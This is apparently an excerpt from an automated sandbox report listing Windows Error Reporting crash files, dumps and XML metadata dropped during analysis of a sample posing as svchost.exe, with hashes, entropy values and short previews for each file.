Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.4.4.0.9.6.1.9.8.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.4.4.2.1.6.5.1.1.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.0.c.a.2.3.7.-.1.8.8.6.-.4.4.9.8.-.b.b.c.5.-.d.e.8.a.c.2.3.5.b.0.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.5.4.9.5.7.b.-.6.6.d.8.-.4.5.4.d.-.a.2.c.a.-.0.7.7.6.d.a.8.c.b.1.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.l.u.d.e.r.o.p.o.l.i.k.o.d.i.q.u.x.e.k.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.4.-.0.0.0.1.-.0.0.1.3.-.a.e.4.2.-.8.9.c.0.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.6.8.5.1.0.d.1.8.e.1.1.9.e.4.b.3.8.3.7.0.8.2.a.6.d.2.c.e.e.5.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.f.5.8.b.4.e.b.3.f.0.f.f.d.a.9.a.2.c.d.9.1.d.e.f.5.8.3.4.2.2.a.1.1.e.d.8.7.3.!.s.v.c.h.

Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.2291570524277007
Encrypted: false
SSDEEP: 192:gXmWZKw0uvduAaqmNTSOZVWdzuiFvZ24lO8E8E:4fKLuvdlaFNeECzuiFvY4lO8HE
MD5: 54DD9DAB108C810C1F2696463317E82F
SHA1: 5E5FB349202833AF011BC20C634462923549B387
SHA-256: 602966970A47F798A27EA027403F6BCE4781E97020402A2CFDC79DEB0697C0F2
SHA-512: 0C34A949CCBA5C67DDB2C8DE8C93595A4B9FA5CA7D36AB0F42246BE9FCA0EE71F6A3AE2985C88B86EDFDFD61BC3718945CAEAEB9B1CACD160E210A14ABC51308
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.4.3.0.2.1.4.3.2.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.4.3.1.2.6.1.1.9.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.b.7.e.c.e.0.-.a.6.f.4.-.4.1.1.3.-.8.7.1.b.-.e.e.d.a.8.4.7.2.d.5.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.6.1.4.0.f.d.-.8.0.a.2.-.4.e.3.e.-.a.2.7.c.-.d.2.7.2.f.9.0.a.5.3.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.l.u.d.e.r.o.p.o.l.i.k.o.d.i.q.u.x.e.k.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.e.4.-.0.0.0.1.-.0.0.1.3.-.2.9.5.1.-.9.b.b.a.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.6.8.5.1.0.d.1.8.e.1.1.9.e.4.b.3.8.3.7.0.8.2.a.6.d.2.c.e.e.5.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.f.5.8.b.4.e.b.3.f.0.f.f.d.a.9.a.2.c.d.9.1.d.e.f.5.8.3.4.2.2.a.1.1.e.d.8.7.3.!.s.v.c.h.

Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.2514971566655746
Encrypted: false
SSDEEP: 192:fVQZs0i0VeWpRaOTYq+Z9fQZzuiFvZ24lO8I8E:tssSVBpRaKY1LczuiFvY4lO8rE
MD5: 5E512E8BD0A88D1B28DF65ACB2690FA8
SHA1: 5868AD784DEEE6F56391E3F2BA4F268F7AF402D8
SHA-256: 2D94E824FC4FDEE15671B3EA032BB3A07721FE1A3F7096BC7E904BD4A9C0958E
SHA-512: A339BDF582D5758B46966F0309D31F9748A67315D5DA6CA441A238454C79A17DD8BFA49470FB83614E041594C2A19788B97DEE286C1C7E5FEEF292DFE0B380DB
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.4.3.2.3.3.7.0.0.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.4.3.3.6.1.8.2.5.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.1.8.6.a.d.9.8.-.d.5.9.d.-.4.8.2.b.-.8.5.a.e.-.e.0.d.7.f.3.3.b.5.1.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.0.e.2.c.e.6.-.c.0.1.0.-.4.4.9.a.-.8.3.8.d.-.4.8.8.1.d.e.b.b.5.a.4.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.l.u.d.e.r.o.p.o.l.i.k.o.d.i.q.u.x.e.k.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.8.-.0.0.0.1.-.0.0.1.3.-.5.0.c.c.-.e.6.b.9.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.6.8.5.1.0.d.1.8.e.1.1.9.e.4.b.3.8.3.7.0.8.2.a.6.d.2.c.e.e.5.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.f.5.8.b.4.e.b.3.f.0.f.f.d.a.9.a.2.c.d.9.1.d.e.f.5.8.3.4.2.2.a.1.1.e.d.8.7.3.!.s.v.c.h.o.
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 16 streams, Fri Apr 26 08:07:10 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):516906
                                                                                                                                                                                                                                                  Entropy (8bit):3.3026005110651724
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:MhwnsvFWB+ymswq+sfbM4FhdxS5PYjvamgXc1MFD/BtIcS7F7Xj21CCqLeLVF3+C:MhDIgAgsf442UJ8qLeLVF3Q/S/E
                                                                                                                                                                                                                                                  MD5:32CC107C2CCCE5462C5C19A512A65C33
                                                                                                                                                                                                                                                  SHA1:CA6DE203C6759BDC6D5F3C54AB29137D93BA137B
                                                                                                                                                                                                                                                  SHA-256:F2ACE67D591B4D9B6A51D841F18D05FA0CF4809A3994E18A7DBA429CC43EE5F2
                                                                                                                                                                                                                                                  SHA-512:508B7A793B67CE8278F90ED86DEDD52C2F210E2B4A2A08495EC59D6E12C0C08D6C5FE808D86BB9226FA3DE9B77FF00066E86C8DFD3B90016F1CA5405440C2DD8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):6562
                                                                                                                                                                                                                                                  Entropy (8bit):3.7298508166611217
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ8m25YHML03pr089bnojafqdem:R6lXJVwYsLCnoef0H
                                                                                                                                                                                                                                                  MD5:CEECD59DB74EC0A593A70055816482D2
                                                                                                                                                                                                                                                  SHA1:393EC10947135A28361028D36C887D427B5213B8
                                                                                                                                                                                                                                                  SHA-256:0423EEBC7C90E3A7D6B9915935F5115538CD2D9D53782B5C34D4A3F6D6C47DF8
                                                                                                                                                                                                                                                  SHA-512:6FF57DD20C89B8FC0601D017EB2A7A0D07B5E403A00C2828BF934809BC867D4E20C62B72E230F0EDB77FE4439987F9E3FA5316CB4BF274F2173709BEE3B33318
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4756
                                                                                                                                                                                                                                                  Entropy (8bit):4.498462031107477
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zstJg771I9gLWpW8VYwYm8M4JCfRFYyq85bwPhswd:uIjfHI7f67V0JCcRPhswd
                                                                                                                                                                                                                                                  MD5:2AE23111F5B485F4715C2E4451D0330C
                                                                                                                                                                                                                                                  SHA1:5764C76578D0DFD8BB77CDC7C8A2350FA539F33C
                                                                                                                                                                                                                                                  SHA-256:83C59215275E9CE7B4307A965D36AF1D8DFAED8D00018BD6CC7F0BB835BB2586
                                                                                                                                                                                                                                                  SHA-512:BA55CDB0D019A6E00098A5FB6C0A15650E2DFBC04C3D592470F1A8ED63162B192B5219BE4F9AB278EB20D77BAA053EAA92A674E7703C18706739DC30446311DD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):89970
                                                                                                                                                                                                                                                  Entropy (8bit):3.0863595795637053
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:zahcB6i2fQqHKhcSeGYiGN/vijCmw4b692BXWAJQpEnvt:zahcB6i2fQqHKhcSeGYiGN/vijCmw4bP
                                                                                                                                                                                                                                                  MD5:443BDAD2B3C57B4E2E1B9DC7AD755FED
                                                                                                                                                                                                                                                  SHA1:3F7B70EAECFA7F50F5A48D68F4F7CF84E127DA7B
                                                                                                                                                                                                                                                  SHA-256:73648263E36BC3E361FA707582537AE1214A2288F6C40E82DC85082B5E671F58
                                                                                                                                                                                                                                                  SHA-512:A61CC28B8E36D8ADE31990FE03554D436015EA21F7EE7D9C64FF7B4810C3F3F9DBFA97C7F1CDD3CAFEF9F0469CC3FF13B126580DD130DBF6CF51AA389E1262F0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                  Entropy (8bit):2.6854254464670997
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:TiZYWNgZpmk93VYhYBWPYHPtUYEZ+ct+iNk2XF+wrULs0ahFkMX0oIIbnl3:2ZDeVmiwU5ahFkMX0ovbnl3
                                                                                                                                                                                                                                                  MD5:4DCFACB88831D317D15C9E639D874330
                                                                                                                                                                                                                                                  SHA1:BB0B7DB08EE80F08A28C1C92D17792E4F8AF9347
                                                                                                                                                                                                                                                  SHA-256:E8610DB722B19F8F85E025471FBFDBFD6D438C0199391E6728E864DCC5BA81BF
                                                                                                                                                                                                                                                  SHA-512:426A84E846E7D08E164F7C782351FF9BCFD6F671BD4EA12B2BBA9D11B632AA43BF6D0322B839C93417C18A1E4635B92B085D7A058DAD87F8B9C1FBCB40712DF6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 16 streams, Fri Apr 26 08:07:12 2024, 0x1205a4 type
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):509917
                                                                                                                                                                                                                                                  Entropy (8bit):3.2910501804768866
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:QgUWgmtVLP2uDOf+5R7XtpGq3ee9XVL3QiA/:QgP3Oaf5kq3eOQ
                                                                                                                                                                                                                                                  MD5:A4E8A93A2842B0BDC1EB8C52B1E896D2
                                                                                                                                                                                                                                                  SHA1:FB441967A4939ADAC8C72AC7C43338EFA85AD837
                                                                                                                                                                                                                                                  SHA-256:AE593652EF89B2AFEC1FCB0AC0431CDB52825445C6495C9E2150751A6B2E1FAA
                                                                                                                                                                                                                                                  SHA-512:4CFB597809A1E21F4588AA81867E8CD7F1F5F59847B9BBBE3337982EE9907B5B2E8E9A6A16F4B321879DA91357166852C5C517DF9D751F1D9D36E715CD95D44E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):8602
                                                                                                                                                                                                                                                  Entropy (8bit):3.701194227713756
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJCNhy6YEbflgmfZtT0yprj89bnjDUfWd7m:R6lXJQE6YETlgmfPKnjwfwy
                                                                                                                                                                                                                                                  MD5:C16F6834257C3D556F26A4F16F8AA487
                                                                                                                                                                                                                                                  SHA1:5E5440DE4444AA9F283222CFC705473A8B25CF62
                                                                                                                                                                                                                                                  SHA-256:6E48F98A94B29039FDF0B95D63C85E6D8F910CF405EB4B03AC6132C2BFABAB03
                                                                                                                                                                                                                                                  SHA-512:560FA9BE44D19A5C9E93A834E152BE1FAFDFA043382539439EAEA09D0EED1A076570C567F171EBFA24D0F82D5BFC0F1EA3192F10C926C9338A8BE671C661639E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
Size (bytes):4811
Entropy (8bit):4.492183509623581
Encrypted:false
SSDEEP:48:cvIwWl8zstJg771I9gLWpW8VYGYm8M4JCfE6Fdehyq8veErTPhuwd:uIjfHI7f67VWJC8UehWPrTPhuwd
MD5:169EBE4780260521484B9BD0A000315B
SHA1:932C700152097F0AE8B06981A39C859E21F0A294
SHA-256:A3D298D432224F513BF9D8A1DEA316FEAF11F4510A598F537B5C9C45E0BEC78F
SHA-512:B23E39C2429F9B45C5E3E816E635EDBC7E5D772A719C9286A13AFC6B562C4F07D826DD09DD165B2648FBB352159FCF787B0CC4E35C6F6BF9A4F997565754767D
Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):89176
Entropy (8bit):3.0876080749875725
Encrypted:false
SSDEEP:1536:1D+S3WzrvqxZMiacJeGvvGWdvHnrXR4b692BXWAJQpEn3rj:1D+S3WzrvqxZMiacJeGvvGWdvHnrXR45
MD5:FA39B3D37C830F2A40AD29C02083F9D5
SHA1:CAFC78768FE9BF54994CB63E44BD3D575EE91C36
SHA-256:7D4E0301AE8572B0395E44E83D3E473D8B7371E7A3AE10172ED323A31C54F81B
SHA-512:F671784A37AAB6A07994CBAA205960B47068FD0B454A5841C687FFD6CFDFBEBFB6ACFED9896BDE6AB788EE89D57E24A29B04881910B6511B946FEA7BA2E544E6
Malicious:false
Preview (UTF-16 decoded):ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.68570186508441
Encrypted:false
SSDEEP:96:TiZYW0bQJWoWlY7YVWPZzSH8UYEZ7ut+i8kFXBGCwP8l8QaNZFtMxLo4IMnl3:2ZD0bzlcNs4TajFtMxLofMnl3
MD5:2723D9AD4B738071EE4CB6505B6DC43D
SHA1:9DA9D44CC5A1B23048E1005F23E063D2049DD460
SHA-256:40D356CF449B351CA12EDE5379A5206B7CBB9EB13AA476033A60309ADFADA74E
SHA-512:7E1394B7BA13E0E107DDDC1411DEE273CEED8256A3D096F6EA6FCCA75E61EFCA154A768CA7A65DED8C981DA1425DBC05CCEF89740993C8DDF4D0D13357B847C4
Malicious:false
                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
Process:C:\Windows\System32\WerFault.exe
File Type:Mini DuMP crash report, 16 streams, Fri Apr 26 08:07:21 2024, 0x1205a4 type
Category:dropped
Size (bytes):515288
Entropy (8bit):3.3057527489015825
Encrypted:false
SSDEEP:3072:GIM5Xsm4EXjS0X/k8CPkwxPRN3XEpJ7A5H8r4SlKCgcS3FMnja1CCq9eSXVL3+vv:GIuL20vHYLz18rfsG4q9eSXVL3QoGq/
MD5:AF0D7662CDCD84AA1A3FBDE38A0B4468
SHA1:84A959DEFB79D8750DB18F7E8F7B220DA0921F0D
SHA-256:87A6E256E73F682A79206C8E8767FBD474572F36CF06FF3C542C138512560431
SHA-512:A972A3A9594909D2704C37AC9057C4E5386DD1E011BD451ADA12164BA2B0B38FC1910750CFB53DFD284534331CB4F94663E11CB6FC0759C88187C102D1EA13A1
Malicious:false
Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8596
Entropy (8bit):3.7051628782199044
Encrypted:false
SSDEEP:192:R6l7wVeJXVS6YW4OhwgmfHML03prG89bnyvafmdAm:R6lXJlS6Yp+wgmfsLsnyyfgl
MD5:13943C5B66A67AE7D6A121769526F507
SHA1:9B2EB3CDF8A0C459D26B74B45DF754BA45B4DCFE
SHA-256:6B1ABD419490721130776410E47B8001A97BA862FF167F7C4EF7EEB45596B7ED
SHA-512:6991C8BF0968D79AE068221D886DC90668D00F6110EDA521016864487262D98DC6E382561CD3CA43EA2BD3C5795491514115CDFB56E344FDC579E52F360F9EA4
Malicious:false
Preview (UTF-16 decoded):<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7412</Pi
Process:C:\Windows\System32\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4756
Entropy (8bit):4.498054788199387
Encrypted:false
SSDEEP:48:cvIwWl8zsvJg771I9gLWpW8VYaSYm8M4JCfRFkyq85bDPhVwd:uIjfRI7f67VhbJCAOPhVwd
MD5:A40D62CEF498685E998174B235A562A7
SHA1:6D065A06363A625EFCF9E0883BFA8A52070EEEBB
SHA-256:BBAFF30FD80EA699B6E487EC45E91E8C032C96610776A2672836CD75659C9026
SHA-512:7FB21548B3DE0CFE7269B5FAD955F45AD8103DE8E41EC42CB8F9A933C7CCAE3C1A79B3BA535333E2B7D717AB5A03D253D04FD55458DBAC2B2B9B495F1424425E
Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296590" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):89316
Entropy (8bit):3.088440007017623
Encrypted:false
SSDEEP:1536:CJ1A5FA9bdKlxd+U+/zG/W+8BuaXb692BXWAJQpEnodhQ/S+fH:CJ1A5FA9bdKlxd+U+/zG/W+8BuaXb69Q
MD5:FF492D46E8F555BD66E1ECF92134F46E
SHA1:D5309BA151A48978505B089959BB813FB4698ACF
SHA-256:9D54EA09B6E4A8F8FF897DB374DF2E0580AD30871D9887EEC3144D7D84689765
SHA-512:888B1FC8E22E14A0C136885FC5782F2B1A1536C47AB438AA3E287E463275D250B08929B581BA14C733744EB72C932E9F909AA41DDF39F9C6F69926761B32E30B
Malicious:false
Preview (UTF-16 decoded):ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.6857806744965216
Encrypted:false
SSDEEP:96:TiZYWxkA4GakYraYHdWPEH1UYEZJjt+iIk3X7YwiR1jRCaJFJM4Co1Ihnl3:2ZDxjMalkRnCaJFJM4CoKhnl3
MD5:CA8AB2D0C4ED3F4349C77AB892793F54
SHA1:976A1635D5E49F0CFECFF84FB8CFF9BE0065E390
SHA-256:A98919178A110DC5577B10E11BF3BA58B5846D362FB7A05BC6A5FB3E0572A2D0
SHA-512:4295756928A4DC46E1A5C5A68EDB7D2E6BE0DEBDA71A24DCAC66E04D9C770EF4E7645D4F8FED6E2926C6C3EEACBAC11B0ED8CDC78B58ADA519B1C6A76CC11D00
Malicious:false
                                                                                                                                                                                                                                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):88854
                                                                                                                                                                                                                                                  Entropy (8bit):3.089108828855378
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:8qdRokX0XmnzdhXlG5Rrz8mbaRKdbasrvK+h+lS+u+aoN+f+X+P+sJ6aG84S:8qdRokX0XmnzdhXlG5Rrz8mbaRKdbasV
                                                                                                                                                                                                                                                  MD5:BE15FCB97D4D51EC1E07E629974C4CAC
                                                                                                                                                                                                                                                  SHA1:812D56678611702B810B6D3518CCD00C257B81F2
                                                                                                                                                                                                                                                  SHA-256:70EBEC4B3F084C716C79413B1BB71E3D70236257C5D24B9D6DA9ECFE794591FA
